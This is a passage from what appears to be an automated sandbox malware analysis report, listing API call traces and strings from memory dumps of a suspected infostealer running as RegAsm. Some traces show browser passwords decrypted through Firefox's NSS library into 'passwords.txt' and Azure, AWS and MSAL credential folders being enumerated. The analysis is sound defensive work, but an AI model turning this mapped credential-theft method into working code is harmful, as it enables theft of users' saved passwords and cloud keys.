                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C7FCDDA
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C7FCDF0
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C7FCE06
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C7FCE1C
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C7FCE32
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C7FCE48
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C7FCE5E
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C7FCE74
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C7FCE8A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: strcmp
                                                                                • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                • API String ID: 1004003707-2809817890
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004083E1
                                                                                • NSS_Init.NSS3(00000000,?,00000000,?), ref: 004083FE
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004084E1
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004084E9
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004084F5
                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 004084FF
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00408510
                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040851C
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00408523
                                                                                • StrStrA.SHLWAPI(?), ref: 00408535
                                                                                • StrStrA.SHLWAPI(-00000010), ref: 0040854F
                                                                                • lstrcat.KERNEL32(00000000), ref: 00408563
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00408575
                                                                                • lstrcat.KERNEL32(00000000,00425DA0), ref: 00408583
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00408595
                                                                                • lstrcat.KERNEL32(00000000,00425DA4), ref: 004085A3
                                                                                • lstrcat.KERNEL32(00000000), ref: 004085B2
                                                                                • lstrcat.KERNEL32(00000000,-00000010), ref: 004085BC
                                                                                • lstrcat.KERNEL32(00000000,00425DA8), ref: 004085CA
                                                                                • StrStrA.SHLWAPI(-000000FE), ref: 004085DA
                                                                                • StrStrA.SHLWAPI(00000014), ref: 004085EA
                                                                                • lstrcat.KERNEL32(00000000), ref: 004085FE
                                                                                  • Part of subcall function 004082DE: memset.MSVCRT ref: 00408305
                                                                                  • Part of subcall function 004082DE: lstrlenA.KERNEL32(0040860A,00000001,?,00000014,00000000,00000000,?,0040860A,00000014), ref: 0040831F
                                                                                  • Part of subcall function 004082DE: CryptStringToBinaryA.CRYPT32(0040860A,00000000,?,0040860A,00000014), ref: 00408329
                                                                                  • Part of subcall function 004082DE: PK11_GetInternalKeySlot.NSS3(?,0040860A,00000014), ref: 00408337
                                                                                  • Part of subcall function 004082DE: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,0040860A,00000014), ref: 0040834C
                                                                                  • Part of subcall function 004082DE: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00408377
                                                                                  • Part of subcall function 004082DE: memcpy.MSVCRT ref: 00408391
                                                                                  • Part of subcall function 004082DE: PK11_FreeSlot.NSS3(?), ref: 004083C1
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0040860F
                                                                                • lstrcat.KERNEL32(00000000,00425DAC), ref: 0040861D
                                                                                • StrStrA.SHLWAPI(-000000FE), ref: 0040862D
                                                                                • StrStrA.SHLWAPI(00000014), ref: 0040863D
                                                                                • lstrcat.KERNEL32(00000000), ref: 00408651
                                                                                  • Part of subcall function 004082DE: lstrcat.KERNEL32(00425BDF,00425BE3), ref: 004083B8
                                                                                  • Part of subcall function 004082DE: lstrcat.KERNEL32(00425BDF,00425BE6), ref: 004083D0
                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00408662
                                                                                • lstrcat.KERNEL32(00000000,00425DB0), ref: 00408670
                                                                                • lstrcat.KERNEL32(00000000,00425DB4), ref: 0040867E
                                                                                • StrStrA.SHLWAPI(-000000FE), ref: 0040868E
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004086A4
                                                                                • memset.MSVCRT ref: 004086F7
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408700
                                                                                • NSS_Shutdown.NSS3 ref: 00408706
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$Filelstrcpy$H_prologK11_lstrlen$HeapPointerSlotmemset$AllocAuthenticateBinaryCloseCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeStringmemcpy
                                                                                • String ID: passwords.txt
                                                                                • API String ID: 2888107993-347816968
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: kernel32.dll
                                                                                • API String ID: 2238633743-1793498882
                                                                                APIs
                                                                                  • Part of subcall function 6C7C4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C7C44B2,6C83E21C,6C83F7F8), ref: 6C7C473E
                                                                                  • Part of subcall function 6C7C4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C7C474A
                                                                                • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C7C44BA
                                                                                • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C7C44D2
                                                                                • InitOnceExecuteOnce.KERNEL32(6C83F80C,6C7BF240,?,?), ref: 6C7C451A
                                                                                • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C7C455C
                                                                                • LoadLibraryW.KERNEL32(?), ref: 6C7C4592
                                                                                • InitializeCriticalSection.KERNEL32(6C83F770), ref: 6C7C45A2
                                                                                • moz_xmalloc.MOZGLUE(00000008), ref: 6C7C45AA
                                                                                • moz_xmalloc.MOZGLUE(00000018), ref: 6C7C45BB
                                                                                • InitOnceExecuteOnce.KERNEL32(6C83F818,6C7BF240,?,?), ref: 6C7C4612
                                                                                • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C7C4636
                                                                                • LoadLibraryW.KERNEL32(user32.dll), ref: 6C7C4644
                                                                                • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C7C466D
                                                                                • VerSetConditionMask.NTDLL ref: 6C7C469F
                                                                                • VerSetConditionMask.NTDLL ref: 6C7C46AB
                                                                                • VerSetConditionMask.NTDLL ref: 6C7C46B2
                                                                                • VerSetConditionMask.NTDLL ref: 6C7C46B9
                                                                                • VerSetConditionMask.NTDLL ref: 6C7C46C0
                                                                                • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C7C46CD
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 6C7C46F1
                                                                                • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C7C46FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                • API String ID: 1702738223-3894940629
                                                                                APIs
                                                                                  • Part of subcall function 6C85CA30: EnterCriticalSection.KERNEL32(?,?,?,6C8BF9C9,?,6C8BF4DA,6C8BF9C9,?,?,6C88369A), ref: 6C85CA7A
                                                                                  • Part of subcall function 6C85CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C85CB26
                                                                                • memset.VCRUNTIME140(00000000,00000000,?,?,6C86BE66), ref: 6C9A6E81
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C86BE66), ref: 6C9A6E98
                                                                                • sqlite3_snprintf.NSS3(?,00000000,6CA0AAF9,?,?,?,?,?,?,6C86BE66), ref: 6C9A6EC9
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C86BE66), ref: 6C9A6ED2
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C86BE66), ref: 6C9A6EF8
                                                                                • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A6F1F
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A6F28
                                                                                • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A6F3D
                                                                                • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C86BE66), ref: 6C9A6FA6
                                                                                • sqlite3_snprintf.NSS3(?,00000000,6CA0AAF9,00000000,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A6FDB
                                                                                • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A6FE4
                                                                                • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A6FEF
                                                                                • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A7014
                                                                                • sqlite3_free.NSS3(00000000,?,?,?,?,6C86BE66), ref: 6C9A701D
                                                                                • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C86BE66), ref: 6C9A7030
                                                                                • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A705B
                                                                                • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C86BE66), ref: 6C9A7079
                                                                                • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A7097
                                                                                • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C86BE66), ref: 6C9A70A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Similarity
                                                                                • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                • String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                • API String ID: 593473924-707647140
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_WrapKey), ref: 6C908E76
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C908EA4
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C908EB3
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C908EC9
                                                                                • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C908EE5
                                                                                • PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C908F17
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C908F29
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C908F3F
                                                                                • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C908F71
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C908F80
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C908F96
                                                                                • PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C908FB2
                                                                                • PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C908FCD
                                                                                • PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C909047
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
                                                                                • API String ID: 1003633598-4293906258
                                                                                APIs
                                                                                • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C924F51,00000000), ref: 6C934C50
                                                                                • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C924F51,00000000), ref: 6C934C5B
                                                                                • PR_smprintf.NSS3(6CA0AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C924F51,00000000), ref: 6C934C76
                                                                                • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C924F51,00000000), ref: 6C934CAE
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C934CC9
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C934CF4
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C934D0B
                                                                                • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C924F51,00000000), ref: 6C934D5E
                                                                                • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C924F51,00000000), ref: 6C934D68
                                                                                • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C934D85
                                                                                • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C934DA2
                                                                                • free.MOZGLUE(?), ref: 6C934DB9
                                                                                • free.MOZGLUE(00000000), ref: 6C934DCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Similarity
                                                                                • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                • API String ID: 3756394533-2552752316
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00416796
                                                                                • memset.MSVCRT ref: 004167B6
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004167DC
                                                                                • lstrcat.KERNEL32(?,\.azure\), ref: 004167F9
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 004162AF: _EH_prolog.MSVCRT ref: 004162B4
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 004162D4
                                                                                  • Part of subcall function 004162AF: FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                  • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,00426908), ref: 00416308
                                                                                  • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,0042690C), ref: 00416322
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416346
                                                                                  • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,0042657D), ref: 00416357
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416374
                                                                                  • Part of subcall function 004162AF: PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,00426924), ref: 004163D9
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,00426928), ref: 004163FB
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                • memset.MSVCRT ref: 00416834
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0041685F
                                                                                • lstrcat.KERNEL32(?,\.aws\), ref: 0041687C
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416388
                                                                                • memset.MSVCRT ref: 004168B7
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004168E2
                                                                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 004168FF
                                                                                  • Part of subcall function 004162AF: FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                  • Part of subcall function 004162AF: FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                • memset.MSVCRT ref: 0041693A
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$H_prologmemsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                • API String ID: 2836893066-974132213
                                                                                • Opcode ID: eafab93a85b15da5a9038299b0ffd7d14768dd6955e4ef185d28edb705030bdc
                                                                                • Instruction ID: bee94e7e3baf3fafe0f6379a1f42c20d34aa1a64c6f182653504fcfef76d90c4
                                                                                • Opcode Fuzzy Hash: eafab93a85b15da5a9038299b0ffd7d14768dd6955e4ef185d28edb705030bdc
                                                                                • Instruction Fuzzy Hash: DC41A6B1D0022CBADB11EBE4DC46EEE7B7CAB1C304F40456FB554A3182DA7C97888B65
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C912DEC
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C912E00
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C912E2B
                                                                                • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C912E43
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C8E4F1C,?,-00000001,00000000,?), ref: 6C912E74
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C8E4F1C,?,-00000001,00000000), ref: 6C912E88
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C912EC6
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C912EE4
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C912EF8
                                                                                • PR_Unlock.NSS3(?), ref: 6C912F62
                                                                                • TlsGetValue.KERNEL32 ref: 6C912F86
                                                                                • EnterCriticalSection.KERNEL32(0000001C), ref: 6C912F9E
                                                                                • PR_Unlock.NSS3(?), ref: 6C912FCA
                                                                                • TlsGetValue.KERNEL32 ref: 6C91301A
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C91302E
                                                                                • PR_Unlock.NSS3(?), ref: 6C913066
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C913085
                                                                                • PR_Unlock.NSS3(?), ref: 6C9130EC
                                                                                • TlsGetValue.KERNEL32 ref: 6C91310C
                                                                                • EnterCriticalSection.KERNEL32(0000001C), ref: 6C913124
                                                                                • PR_Unlock.NSS3(?), ref: 6C91314C
                                                                                  • Part of subcall function 6C8F9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C92379E,?,6C8F9568,00000000,?,6C92379E,?,00000001,?), ref: 6C8F918D
                                                                                  • Part of subcall function 6C8F9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C92379E,?,6C8F9568,00000000,?,6C92379E,?,00000001,?), ref: 6C8F91A0
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07AD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07CD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07D6
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C85204A), ref: 6C8C07E4
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,6C85204A), ref: 6C8C0864
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C8C0880
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,6C85204A), ref: 6C8C08CB
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08D7
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08FB
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C91316D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                • String ID:
                                                                                • API String ID: 3383223490-0
                                                                                • Opcode ID: 3199c2c111397bcd9a16487b7b620f6df30565596dcb884ea27376287969780e
                                                                                • Instruction ID: 46fedd749b0c4bc49ff42f3540c55474c10765cd5c7f58d2e8528a5e6279b589
                                                                                • Opcode Fuzzy Hash: 3199c2c111397bcd9a16487b7b620f6df30565596dcb884ea27376287969780e
                                                                                • Instruction Fuzzy Hash: BCF1D1B1E046099FEF10EF64D845B9DBBB8BF0A318F144168EC04A7B11E735E995CB91
                                                                                APIs
                                                                                  • Part of subcall function 6C916910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C916943
                                                                                  • Part of subcall function 6C916910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C916957
                                                                                  • Part of subcall function 6C916910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C916972
                                                                                  • Part of subcall function 6C916910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C916983
                                                                                  • Part of subcall function 6C916910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C9169AA
                                                                                  • Part of subcall function 6C916910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C9169BE
                                                                                  • Part of subcall function 6C916910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C9169D2
                                                                                  • Part of subcall function 6C916910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C9169DF
                                                                                  • Part of subcall function 6C916910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C916A5B
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C916D8C
                                                                                • free.MOZGLUE(00000000), ref: 6C916DC5
                                                                                • free.MOZGLUE(?), ref: 6C916DD6
                                                                                • free.MOZGLUE(?), ref: 6C916DE7
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C916E1F
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C916E4B
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C916E72
                                                                                • free.MOZGLUE(?), ref: 6C916EA7
                                                                                • free.MOZGLUE(?), ref: 6C916EC4
                                                                                • free.MOZGLUE(?), ref: 6C916ED5
                                                                                • free.MOZGLUE(00000000), ref: 6C916EE3
                                                                                • free.MOZGLUE(?), ref: 6C916EF4
                                                                                • free.MOZGLUE(?), ref: 6C916F08
                                                                                • free.MOZGLUE(00000000), ref: 6C916F35
                                                                                • free.MOZGLUE(?), ref: 6C916F44
                                                                                • free.MOZGLUE(?), ref: 6C916F5B
                                                                                • free.MOZGLUE(00000000), ref: 6C916F65
                                                                                  • Part of subcall function 6C916C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C91781D,00000000,6C90BE2C,?,6C916B1D,?,?,?,?,00000000,00000000,6C91781D), ref: 6C916C40
                                                                                  • Part of subcall function 6C916C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C91781D,?,6C90BE2C,?), ref: 6C916C58
                                                                                  • Part of subcall function 6C916C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C91781D), ref: 6C916C6F
                                                                                  • Part of subcall function 6C916C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C916C84
                                                                                  • Part of subcall function 6C916C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C916C96
                                                                                  • Part of subcall function 6C916C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C916CAA
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C916F90
